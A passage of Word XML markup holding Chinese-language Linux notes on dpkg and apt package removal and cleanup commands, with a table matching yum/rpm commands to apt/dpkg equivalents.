      </w:r>
      <w:r w:rsidRPr="00821BA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。而</w:t>
      </w:r>
      <w:r w:rsidRPr="00502CF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dpkg --purge</w:t>
      </w:r>
      <w:r w:rsidRPr="00502CF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则安装文件和配置文件都删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00821BA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D14D9" w14:textId="7BE1B08B" w:rsidR="00821BA9" w:rsidRDefault="006164C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006164C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先列举出</w:t>
      </w:r>
      <w:r w:rsidRPr="006164C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libreoffice</w:t>
      </w:r>
      <w:r w:rsidRPr="006164C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的软件，看哪些是已经安装的。命令为</w:t>
      </w:r>
      <w:r w:rsidRPr="006164C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: dpkg -l libreoffice*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F08213C" w14:textId="6474D147" w:rsidR="00821BA9" w:rsidRDefault="00590396" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00590396">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ii</w:t>
      </w:r>
      <w:r w:rsidRPr="00590396">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就是已经安装的软件</w:t>
      </w:r>
      <w:r w:rsidRPr="00590396">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, rc</w:t>
      </w:r>
      <w:r w:rsidRPr="00590396">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则表示已经被删除，但配置文件还存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00590396">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3168C3E0" w14:textId="448CF446" w:rsidR="00590396" w:rsidRDefault="00590396" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E83ED41" w14:textId="58A0751F" w:rsidR="00655032" w:rsidRDefault="00655032" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理依赖方面，直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以了，不建议手动使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dpkg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清理依赖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FBF5C6" w14:textId="51E4EB2D" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>pt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是建立在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dpkg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之上的管理工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50026D92" w14:textId="77777777" w:rsidR="00655032" w:rsidRDefault="00655032" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE67FD2" w14:textId="0F011B24" w:rsidR="00590396" w:rsidRDefault="005115F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00366CA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>清理无效依赖：</w:t>
      </w:r>
      <w:r w:rsidRPr="00366CA5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>apt autoremove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C26CC1" w14:textId="77777777" w:rsidR="004A1B00" w:rsidRDefault="004A1B00" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt-get update # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D32266" w14:textId="77777777" w:rsidR="004A1B00" w:rsidRDefault="004A1B00" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt-get -f install # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决依赖关系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387AF664" w14:textId="0FDB6751" w:rsidR="005115F3" w:rsidRDefault="004A1B00" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo dpkg -i xxx.deb # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB017B8" w14:textId="048AB986" w:rsidR="005115F3" w:rsidRDefault="005115F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0543F229" w14:textId="23187280" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载一个已安装的软件包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保留配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AADB52F" w14:textId="7BED68BF" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt-get remove xxxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD855D4" w14:textId="77777777" w:rsidR="00226E24" w:rsidRDefault="00226E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203A7FB6" w14:textId="4F619C54" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载一个已安装的软件包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F421BC4" w14:textId="6EB71516" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt-get -purge remove xxxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B0CD47" w14:textId="77777777" w:rsidR="00226E24" w:rsidRDefault="00226E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203AAB7F" w14:textId="19BFE002" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/cache/apt/archives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录里的缓存包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1F837" w14:textId="71015D94" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt-get clean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6FEC97" w14:textId="77777777" w:rsidR="00226E24" w:rsidRDefault="00226E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C77DF5" w14:textId="4CD43BCA" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/cache/apt/archives </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录，只清理过时的包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0837E8C3" w14:textId="0506938C" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt-get autoclean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68570932" w14:textId="77777777" w:rsidR="00226E24" w:rsidRDefault="00226E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ADE066" w14:textId="6E08AADD" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除软件包及配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57866E96" w14:textId="5DA9F0D1" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo apt-get remove xxx </w:t>
      </w:r>
      <w:r w:rsidR="00226E24">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>purge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70231581" w14:textId="77777777" w:rsidR="00226E24" w:rsidRPr="00226E24" w:rsidRDefault="00226E24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42654B4E" w14:textId="5B887491" w:rsidR="00F77AFD" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除不再需要的软件包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC0EB0" w14:textId="344866E7" w:rsidR="005115F3" w:rsidRDefault="00F77AFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt-get autoremove -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C9A3B2" w14:textId="77777777" w:rsidR="005115F3" w:rsidRDefault="005115F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2804EF5A" w14:textId="0FE8F696" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="264" w:name="_Toc159779724"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>um(rpm)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>pt-get(dpkg)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的对应关系</w:t>
      </w:r>
      <w:bookmarkEnd w:id="264"/>
    </w:p>
    <w:p w14:paraId="5C434C90" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>説明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Redhat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Debian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDD1AF0" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新缓存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum makecache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F2EDE" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>apt-get upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395F802" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>apt-cache search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5813C8" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索包内文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum provides</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>apt-file search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFBBC31" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装指定的包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>apt-get install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106F8A28" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除指定的包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum remove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>apt-get remove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2213D8CE" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示指定包的信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>apt-cache show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E711A1E" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示包所在组的一览</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum grouplist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0403F573" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示指定包所在组的信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum groupinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EBFCB1" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装指定的包组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum groupinstall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4649E9D1" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除指定的包组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>yum groupremove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9BD6C3" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考库的设定文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>/etc/yum.repos.d/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>/etc/apt/sources.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218AB688" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装完的包的列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>rpm -qa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>dpkg-query -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61894204" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示安装完的指定包的信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>rpm -qi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>apt-cache show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B67FA6" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装完的指定包内的文件列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>rpm -ql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>dpkg-query -L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194BE83C" w14:textId="77777777" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装完的包的信赖包的列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>rpm -qR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>apt-cache depends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B341C30" w14:textId="714D3535" w:rsidR="00207122" w:rsidRDefault="00207122" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装完的文件信赖的包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>rpm -qf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>dpkg -S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF1D7A" w14:textId="0B1AA877" w:rsidR="008F729E" w:rsidRDefault="008F729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BD9A3A" w14:textId="77777777" w:rsidR="008F729E" w:rsidRPr="00FD3D1D" w:rsidRDefault="008F729E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F8D573" w14:textId="2154A45E" w:rsidR="008A0780" w:rsidRDefault="008A0780" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="265" w:name="_Toc159779725"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>buntu22.04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSR</w:t>
      </w:r>
      <w:r w:rsidR="00953D71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00953D71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不推荐</w:t>
      </w:r>
      <w:bookmarkEnd w:id="265"/>
    </w:p>
